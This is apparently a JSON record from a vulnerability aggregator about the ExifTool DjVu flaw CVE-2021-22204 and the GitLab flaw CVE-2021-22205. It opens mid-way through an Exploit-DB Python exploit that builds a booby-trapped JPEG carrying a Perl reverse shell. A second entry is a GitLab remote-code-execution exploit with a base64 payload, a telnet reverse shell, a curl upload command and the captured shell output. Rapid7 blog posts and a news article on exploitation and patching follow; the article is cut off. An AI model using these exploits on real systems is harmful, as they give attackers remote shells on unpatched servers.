_/ ___/ __ \\/ _ \\/ _ \\{color.no}\r\n{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}\r\n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____/_/|_/___/\\___/\\____/_/|_/____/{color.green}....{color.no}\r\n \"\"\")\r\n\r\n# Print exploit help menu\r\ndef help():\r\n print(r\"\"\"UNICORD Exploit for CVE-2021-22204\r\n\r\nUsage:\r\n python3 exploit-CVE-2021-22204.py -c <command>\r\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>\r\n python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]\r\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]\r\n python3 exploit-CVE-2021-22204.py -h\r\n\r\nOptions:\r\n -c Custom command mode. Provide command to execute.\r\n -s Reverse shell mode. Provide local IP and port.\r\n -i Path to custom JPEG image. (Optional)\r\n -h Show this help menu.\r\n\"\"\")\r\n\r\n# Run the exploit\r\ndef exploit(command):\r\n\r\n UNICORD_ASCII()\r\n\r\n # Create perl payload\r\n payload = \"(metadata \\\"\\c${\"\r\n payload += command\r\n payload += \"};\\\")\"\r\n\r\n print(f\"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}\")\r\n print(f\"{color.red}PAYLOAD: {color.gold}\" + payload + f\"{color.no}\")\r\n\r\n # Write payload to file\r\n payloadFile = open('payload','w')\r\n payloadFile.write(payload)\r\n payloadFile.close()\r\n\r\n # Bzz compress file\r\n subprocess.run(['bzz', 'payload', 'payload.bzz'])\r\n\r\n # Run djvumake\r\n subprocess.run(['djvumake', 'exploit.djvu', \"INFO=1,1\", 'BGjp=/dev/null', 'ANTz=payload.bzz'])\r\n\r\n if '-i' in sys.argv:\r\n imagePath = sys.argv[sys.argv.index('-i') + 1]\r\n subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])\r\n\r\n else:\r\n # Smallest possible JPEG\r\n image = b\"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=\"\r\n\r\n # Write smallest possible JPEG image to file\r\n with open(\"image.jpg\", \"wb\") as img:\r\n img.write(base64.decodebytes(image))\r\n\r\n # Write exiftool config to file\r\n config = (r\"\"\"\r\n %Image::ExifTool::UserDefined = (\r\n 'Image::ExifTool::Exif::Main' => {\r\n 0xc51b => {\r\n Name => 'HasselbladExif',\r\n Writable => 'string',\r\n WriteGroup => 'IFD0',\r\n },\r\n },\r\n );\r\n 1; #end\r\n \"\"\")\r\n configFile = open('exiftool.config','w')\r\n configFile.write(config)\r\n configFile.close()\r\n\r\n # Exiftool config for output image\r\n subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])\r\n\r\n # Delete leftover files\r\n os.remove(\"payload\")\r\n os.remove(\"payload.bzz\")\r\n os.remove(\"exploit.djvu\")\r\n os.remove(\"exiftool.config\")\r\n\r\n # Print results\r\n print(f\"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\\n\")\r\n\r\n exit()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n args = ['-h','-c','-s','-i']\r\n\r\n if args[0] in sys.argv:\r\n help()\r\n\r\n elif args[1] in sys.argv and not args[2] in sys.argv:\r\n exec = sys.argv[sys.argv.index(args[1]) + 1]\r\n command = f\"system(\\'{exec}\\')\"\r\n exploit(command)\r\n\r\n elif args[2] in sys.argv and not args[1] in sys.argv:\r\n localIP = sys.argv[sys.argv.index(args[2]) + 1]\r\n localPort = sys.argv[sys.argv.index(args[2]) + 2]\r\n command = f\"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};\"\r\n exploit(command)\r\n\r\n else:\r\n help()", "sourceHref": "https://www.exploit-db.com/download/50911", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:03:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-17T00:00:00", "type": "exploitdb", "title": "GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-22205", "CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-17T00:00:00", "id": "EDB-ID:50532", "href": "https://www.exploit-db.com/exploits/50532", "sourceData": "# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)\r\n# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22\r\n# Date: 11/01/2021\r\n# Exploit Author: Jacob Baines\r\n# Vendor Homepage: https://about.gitlab.com/\r\n# Software Link: https://gitlab.com/gitlab-org/gitlab\r\n# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8\r\n# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)\r\n# CVE : CVE-2021-22205\r\n# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/\r\n# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed\r\n\r\nCode execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.\r\n\r\n1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.\r\n\r\necho -e\r\n\"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=\"\r\n| base64 -d > lol.jpg\r\necho -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg\r\necho -n\r\n\"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==\"\r\n| base64 -d >> lol.jpg\r\n\r\n2. Sending the payload. Any random endpoint will do.\r\n\r\ncurl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)\r\n\r\n2a. Sample Output from the reverse shell:\r\n\r\n$ nc -lnvp 1270\r\nListening on [0.0.0.0] (family 0, port 1270)\r\nConnection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport\r\n34836)\r\nwhoami\r\ngit\r\nid\r\nuid=998(git) gid=998(git) groups=998(git)", "sourceHref": "https://www.exploit-db.com/download/50532", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-05-14T19:40:32", "description": "## Stopped at the gate?\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/05/metasploit-ascii-1.png)\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/05/Gate_but_no_fence_-_geograph.org.uk_-_711557.jpg)\n\nA fun new module from [timwr](<https://github.com/timwr>), taking advantage of a technique reported by [Cedric Owens](<https://twitter.com/cedowens>), is reminding everyone if there is no fence a gate will not deter us. The new module provides a quick wrapper for payloads that bypasses download origination and authorization requirements known as GateKeeper in MacOS 10.15+ to simply sidestep the gate when a user opens their gift.\n\n## Cookies are tastier if you pilfer them from the jar.\n\nRecent updates to how modules interact with cookies got a little more love baked in. This week [agalway-r7](<https://github.com/agalway-r7>) clarified the recipe a bit with documentation on various methods in the new API, and [adfoster-r7](<https://github.com/adfoster-r7>) came around and swept up any crumbs modules might leave behind.\n\n## New Module Content (2)\n\n * [macOS Gatekeeper check bypass](<https://github.com/rapid7/metasploit-framework/pull/15102>) by [Cedric Owens](<https://twitter.com/cedowens>) and [timwr](<https://github.com/timwr>), which exploits [CVE-2021-30657](<https://attackerkb.com/topics/MrqDl2L0CZ/cve-2021-30657-malicious-applications-may-bypass-gatekeeper-checks?referrer=blog>) \\- This adds the `exploit/osx/browser/osx_gatekeeper_bypass` module that exploits a vulnerability in MacOS versions `10.15` to `11.3` inclusive. The module generates an app that is missing an `Info.plist` file. When downloaded and executed by a user, the signed / notarization checks standard for downloaded files will be bypassed, granting code execution on the target.\n * [ExifTool DjVu ANT Perl injection](<https://github.com/rapid7/metasploit-framework/pull/15185>) by [Justin Steven](<https://github.com/justinsteven>) and [William Bowling](<https://twitter.com/wcbowling>), which exploits [CVE-2021-22204](<https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204?referrer=blog>) \\- A new module has been added which exploits CVE-2021-22204, an arbitrary Perl injection vulnerability within the DjVu module of ExifTool 7.44 to 12.23 that allows for RCE when parsing a malicious file containing a crafted DjVu ANT (Annotation) section.\n\n## Enhancements and features\n\n * [#15054](<https://github.com/rapid7/metasploit-framework/pull/15054>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Updates msfdb to work on additional platforms. Specifically Ubuntu through pg_ctlcluster, as well as existing or remote databases with the new `--connection-string` option. This option can be used to interact with docker PostgreSQL containers\n * [#15125](<https://github.com/rapid7/metasploit-framework/pull/15125>) from [1itt1eB0y](<https://github.com/1itt1eB0y>) \\- The `session_notifier.rb` plugin has been updated to support Gotify, allowing users to be notified of new sessions via Gotify notifications.\n * [#15158](<https://github.com/rapid7/metasploit-framework/pull/15158>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds tests for the auth brute mixin\n * [#15165](<https://github.com/rapid7/metasploit-framework/pull/15165>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Adds documentation for the new cookie jar implementation which is available for http-based modules\n * [#15175](<https://github.com/rapid7/metasploit-framework/pull/15175>) from [whokilleddb](<https://github.com/whokilleddb>) \\- The `rejetto_hfs_exec` module has been updated to replace calls to the depreciated `URI.encode` function with calls to the `URI::encode_www_form_component` function. This prevents users from being shown depreciation warnings when running the module.\n\n## Bugs Fixed\n\n * [#15149](<https://github.com/rapid7/metasploit-framework/pull/15149>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an edge case were cookies left over from one module run could impact the next module run\n * [#15171](<https://github.com/rapid7/metasploit-framework/pull/15171>) from [timwr](<https://github.com/timwr>) \\- The `lib/msf/core/post/common.rb` and `lib/msf/ui/console/command_dispatcher/core.rb` libraries have been updated to properly support passing timeouts to `session.sys.process.capture_output()`, allowing users to specify timeouts when executing commands on sessions. Previously these options would be ignored and a default timeout of 15 seconds would be used instead.\n * [#15179](<https://github.com/rapid7/metasploit-framework/pull/15179>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The `swagger-blocks` dependency has been marked as a default dependency for all installs, preventing cases where if a user did not install the `development` and `tests` groups, they would be unable to start the web service.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-05T09%3A27%3A49-04%3A00..2021-05-12T18%3A09%3A40-05%3A00%22>)\n * [Full diff 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/compare/6.0.43...6.0.44>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).\n\n * _Image credit: Steve F, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_", "cvss3": {}, "published": "2021-05-14T17:29:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22204", "CVE-2021-30657"], "modified": "2021-05-14T17:29:09", "id": "RAPID7BLOG:830105C5509FB1C4D38B114EDD71298E", "href": "https://blog.rapid7.com/2021/05/14/metasploit-wrap-up-111/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-01T15:03:07", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-22205 | [GitLab Advisory](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/>) | [AttackerKB](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog>) | Evaluating | ASAP | November 1, 2021 \n \n![GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild](https://blog.rapid7.com/content/images/2021/11/GettyImages-1127457566.jpg)\n\nOn April 14, 2021, GitLab published a [security release](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/>) to address CVE-2021-22205, a critical remote code execution vulnerability in the service\u2019s web interface. At the time, GitLab described the issue as an authenticated vulnerability that was the result of passing user-provided images to the service\u2019s embedded version of ExifTool. A remote attacker could execute arbitrary commands as the `git` user due to ExifTool\u2019s mishandling of DjVu files, an issue that was later assigned [CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>).\n\nCVE-2021-22205 was initially assigned a CVSSv3 score of 9.9. However, on September 21, 2021 [GitLab revised](<https://gitlab.com/gitlab-org/cves/-/commit/29e8470a3704632adad0c6a97865bd2caea7b336>) the CVSSv3 score to 10.0. The increase in score was the result of changing the vulnerability from an authenticated issue to an unauthenticated issue. Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders. Rapid7\u2019s vulnerability research team has [a full root cause analysis of CVE-2021-22205](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog>) in AttackerKB.\n\nThere are multiple recently published public exploits for this vulnerability, and it reportedly has been [exploited in the wild](<https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/>) since June or July of 2021. We expect exploitation to increase as details of the unauthenticated nature of this vulnerability become more widely understood.\n\nAccording to [GitLab\u2019s April 2021 advisory](<https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/#Remote-code-execution-when-uploading-specially-crafted-image-files>), CVE-2021-22205 affects all versions of both GitLab Enterprise Edition (EE) and GitLab Community Edition (CE) starting from 11.9. The vulnerability was **patched** in the following versions:\n\n * 13.10.3\n * 13.9.6\n * 13.8.8\n\n## Versions in the wild\n\nAt the time of writing (October 31, 2021), patches have been available for GitLab for more than six months. However, analysis of internet-facing GitLab instances suggests that a large number are still vulnerable.\n\nWe can see just short of 60,000 internet-facing GitLab installations. Unfortunately, GitLab\u2019s web interface does not have an easy-to-extract version string. But by using the appearance of `application_utilities` [about a year ago](<https://gitlab.com/gitlab-org/gitlab/-/commit/3b87ee87165aed7840f4257f12c0acc185056cc5>) and then the migration of application_utilities into [loading hints](<https://gitlab.com/gitlab-org/gitlab/-/commit/a712e481804acd57d7dadca3c1c6cfba38438ec4>) header, we can break the internet-facing GitLab installs into three categories: unpatched, maybe patched, and patched.\n\nOf the 60,000 this is what we found:\n\n * 21% of installs are fully patched against this issue.\n * 50% of installs are not patched against this issue.\n * 29% of installs may or may not be vulnerable.\n\n## Mitigation guidance\n\nRapid7\u2019s emergent threat response team has a [full technical analysis of CVE-2021-22205](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=blog>) in AttackerKB, along with several ways for GitLab customers to determine whether they may be running vulnerable versions.\n\nGitLab users should upgrade to the latest version of GitLab as soon as possible. In addition, ideally, GitLab should not be an internet facing service. If you need to access your GitLab from the internet, consider placing it behind a VPN.\n\n## Rapid7 customers\n\nOur researchers are currently evaluating the feasibility of adding a vulnerability check for CVE-2021-22205.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-01T13:33:43", "type": "rapid7blog", "title": "GitLab Unauthenticated Remote Code Execution CVE-2021-22205 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-01T13:33:43", "id": "RAPID7BLOG:42058F70E3A275D52C950440A003EA6D", "href": "https://blog.rapid7.com/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-05T21:03:08", "description": "## GitLab RCE\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/11/metasploit-sky.png)\n\nNew Rapid7 team member [jbaines-r7](<https://github.com/jbaines-r7>) wrote an exploit targeting GitLab via the ExifTool command. Exploiting this vulnerability results in unauthenticated remote code execution as the git user. What makes this module extra neat is the fact that it chains two vulnerabilities together to achieve this desired effect. The first vulnerability is in GitLab itself that can be leveraged to pass invalid image files to the ExifTool parser which contained the second vulnerability whereby a specially-constructed image could be used to execute code. For even more information on these vulnerabilities, check out Rapid7\u2019s [post](<https://www.google.com/url?q=https://www.rapid7.com/blog/post/2021/11/01/gitlab-unauthenticated-remote-code-execution-cve-2021-22205-exploited-in-the-wild/&sa=D&source=docs&ust=1636139578431000&usg=AOvVaw3-5j1puSInH2-QJ-QybXUC>).\n\n## Less Than BulletProof\n\nThis week community member [h00die](<https://github.com/h00die>) submitted another Wordpress module. This one leverages an information disclosure vulnerability in the Wordpress BulletProof Security plugin that can disclose user credentials from a backup file. These credentials could then be used by a malicious attacker to login to Wordpress if the hashed password is able to be cracked in an offline attack.\n\n## Metasploit Masterfully Manages Meterpreter Metadata\n\nEach Meterpreter implementation is a unique snowflake that often incorporates API commands that others may not. A great example of this are all the missing Kiwi commands in the Linux Meterpreter. Metasploit now has much better support for modules to identify the functionality they require a Meterpreter session to have in order to run. This will help alleviate frustration encountered by users when they try to run a post module with a Meterpreter type that doesn\u2019t offer functionality that is needed. This furthers the Metasploit project goal of providing more meaningful error information regarding post module incompatibilities which has been an ongoing effort this year.\n\n## New module content (3)\n\n * [Wordpress BulletProof Security Backup Disclosure](<https://github.com/rapid7/metasploit-framework/pull/15765>) by Ron Jost (Hacker5preme) and h00die, which exploits [CVE-2021-39327](<https://attackerkb.com/topics/0EEjQ5WNrl/cve-2021-39327?referrer=blog>) \\- This adds an auxiliary module that leverages an information disclosure vulnerability in the BulletproofSecurity plugin for Wordpress. This vulnerability is identified as CVE-2021-39327. The module retrieves a backup file, which is publicly accessible, and extracts user credentials from the database backup.\n * [GitLab Unauthenticated Remote ExifTool Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15816>) by William Bowling and jbaines-r7, which exploits [CVE-2021-22204](<https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204?referrer=blog>) and [CVE-2021-22205](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205?referrer=blog>) \\- This adds an exploit for an unauthenticated remote command injection in GitLab via a separate vulnerability within ExifTool. The vulnerabilities are identified as CVE-2021-22204 and CVE-2021-22205.\n * [WordPress Plugin Pie Register Auth Bypass to RCE](<https://github.com/rapid7/metasploit-framework/pull/15761>) by Lotfi13-DZ and h00die - This exploits an authentication bypass which leads to arbitrary code execution in versions `3.7.1.4` and below of the Wordpress plugin, `pie-register`. Supplying a valid admin id to the `user_id_social_site` parameter in a POST request now returns a valid session cookie. With that session cookie, a PHP payload as a plugin is uploaded and requested, resulting in code execution.\n\n## Enhancements and features\n\n * [#15665](<https://github.com/rapid7/metasploit-framework/pull/15665>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This adds additional metadata to exploit modules to specify Meterpreter command requirements. Metadata information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn't support the required command functionality.\n * [#15782](<https://github.com/rapid7/metasploit-framework/pull/15782>) from [k0pak4](<https://github.com/k0pak4>) \\- This updates the iis_internal_ip module to include coverage for the PROPFIND internal IP address disclosure as described by CVE-2002-0422.\n\n## Bugs fixed\n\n * [#15805](<https://github.com/rapid7/metasploit-framework/pull/15805>) from [timwr](<https://github.com/timwr>) \\- This bumps the metasploit-payloads version to include two bug fixes for the Python Meterpreter.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.12...6.1.13](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-28T08%3A17%3A18-05%3A00..2021-11-04T08%3A10%3A58-05%3A00%22>)\n * [Full diff 6.1.12...6.1.13](<https://github.com/rapid7/metasploit-framework/compare/6.1.12...6.1.13>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-05T19:43:51", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0422", "CVE-2021-22204", "CVE-2021-22205", "CVE-2021-39327"], "modified": "2021-11-05T19:43:51", "id": "RAPID7BLOG:3F66B870CB36C9E127B4D6BB5B5FF37B", "href": "https://blog.rapid7.com/2021/11/05/metasploit-wrap-up-137/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:26", "description": "[![RCE Vulnerability in VirusTotal](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTb5h9a7HgQYjqGGyu1IRlsXV6h_tKuOOWhc95Aj7yQIt9N54_EJ_Hs1Q1RiAGZ4m6Liai9fNdUdXMrQUOeGO7ZJHlzY-gAUgfrO5caOrLIfiym5Fh6alq-KXGrA1a-K661Du7Ce3s7oHusFNOOBnfshg2xlj25NgUuZAPWhI1oPLY4t5Uo1eHMlUP/s728-e1000/vt.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTb5h9a7HgQYjqGGyu1IRlsXV6h_tKuOOWhc95Aj7yQIt9N54_EJ_Hs1Q1RiAGZ4m6Liai9fNdUdXMrQUOeGO7ZJHlzY-gAUgfrO5caOrLIfiym5Fh6alq-KXGrA1a-K661Du7Ce3s7oHusFNOOBnfshg2xlj25NgUuZAPWhI1oPLY4t5Uo1eHMlUP/s728-e100/vt.jpg>)\n\nSecurity researchers have disclosed a security issue that could have allowed attackers to weaponize the VirusTotal platform as a conduit to achieve remote code execution (RCE) on unpatched third-party sandboxing machines employed antivirus engines.\n\nThe flaw, now patched, made it possible to \"execute commands remotely within [through] VirusTotal platform and gain access to its various scans capabilities,\" Cysource researchers Shai Alfasi and Marlon Fabiano da Silva said in a [report](<https://www.cysrc.com/blog/virus-total-blog >) exclusively shared with The Hacker News.\n\n[VirusTotal](<https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works>), part of Google's Chronicle security subsidiary, is a malware-scanning service that analyzes suspicious files and URLs and checks for viruses using more than 70 third-party antivirus products.\n\nThe attack method involved uploading a DjVu file via the platform's [web user interface](<https://www.virustotal.com/gui/home/upload>) that when passed to multiple third-party malware scanning engines could trigger an exploit for a high-severity remote code execution flaw in [ExifTool](<https://en.wikipedia.org/wiki/ExifTool>), an open-source utility used to read and edit EXIF metadata information in image and PDF files.\n\n[![RCE Vulnerability in VirusTotal](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhE2tELGfUlHBJVYWA6aiTzN28eiqkVNqUeGyO2lWmsp8bfN5XJ9Nbpy2sw1HC0y5ma198rdeM68TCAtvyWrmw1Al65eqkicNAa7gwwOwmXMp_RRPSYW92tNyF6UfNop4JgwBmwfc0ew7QhWWvnZUFmpK_yT7ngJvdRB-SXsWNNsYsSJqlco6_Ox7WT/s728-e1000/vt-1.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhE2tELGfUlHBJVYWA6aiTzN28eiqkVNqUeGyO2lWmsp8bfN5XJ9Nbpy2sw1HC0y5ma198rdeM68TCAtvyWrmw1Al65eqkicNAa7gwwOwmXMp_RRPSYW92tNyF6UfNop4JgwBmwfc0ew7QhWWvnZUFmpK_yT7ngJvdRB-SXsWNNsYsSJqlco6_Ox7WT/s728-e100/vt-1.jpg>)\n\nTracked as [CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>) (CVSS score: 7.8), the high-severity [vulnerability](<https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html>) in question is a case of arbitrary code execution that arises from ExifTool's mishandling of DjVu files. The issue was patched by its maintainers in a [security update](<https://exiftool.org/ancient_history.html>) released on April 13, 2021.\n\nA consequence of such an exploitation, the researchers noted, was that it granted a reverse shell to affected machines linked to some antivirus engines that had not yet been patched for the remote code execution vulnerability.\n\n[![RCE Vulnerability in 